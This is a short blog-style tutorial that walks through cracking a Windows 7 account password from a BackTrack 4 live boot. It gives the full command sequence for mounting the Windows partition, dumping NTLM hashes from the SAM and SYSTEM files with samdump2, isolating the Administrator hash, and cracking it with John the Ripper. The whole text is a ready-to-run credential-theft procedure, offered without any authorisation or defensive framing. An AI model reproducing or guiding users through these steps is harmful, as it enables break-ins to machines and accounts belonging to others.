Cracking Windows seven Password with Backtrack-4(Using Samdump and JTR)

In this post I am going to guide you how to crack windows 7 password with Backtrack 4

1. Boot the system with backtrack4 and wait for the operating system to load. Use "startx" command to get the desktop. 2. Open the Konsole and use the command "fdisk -l" to know the details of your partition. The partition sda stands for sata type and hda stands for ide. 3. Create a directory say "mkdir /mnt/sda2" 4. Mount your device parition to the directory "mount -t ntfs /dev/sda2 /mnt/sda2" where /dev/sda2 is the your windows7 operating system partition. 5. change the directory to the location "SAM" file where the passwords hashes of windows operating system is present. "cd /mnt/sda2/Windows/System32/config" 6. Use the tool "Samdump" to move the hashes from the SAM file to the file "pass1" "samdump2 system sam> /root/pass1" 7. using the "grep" command search the Administrator hash in the file and write it to another file "pass2" "cat /root/pass1 | grep Administrator > /root/pass2" 8. Change the directory to /pentest/password/jtr "cd /pentest/passwords/jtr" 9. Type ./john to see the format and various options of cracking. 10. Here windows use the NTLM hash so we use the following command to crack it. "./john --format=NT /root/pass2" Thats it your hash will be cracked and you will get the password.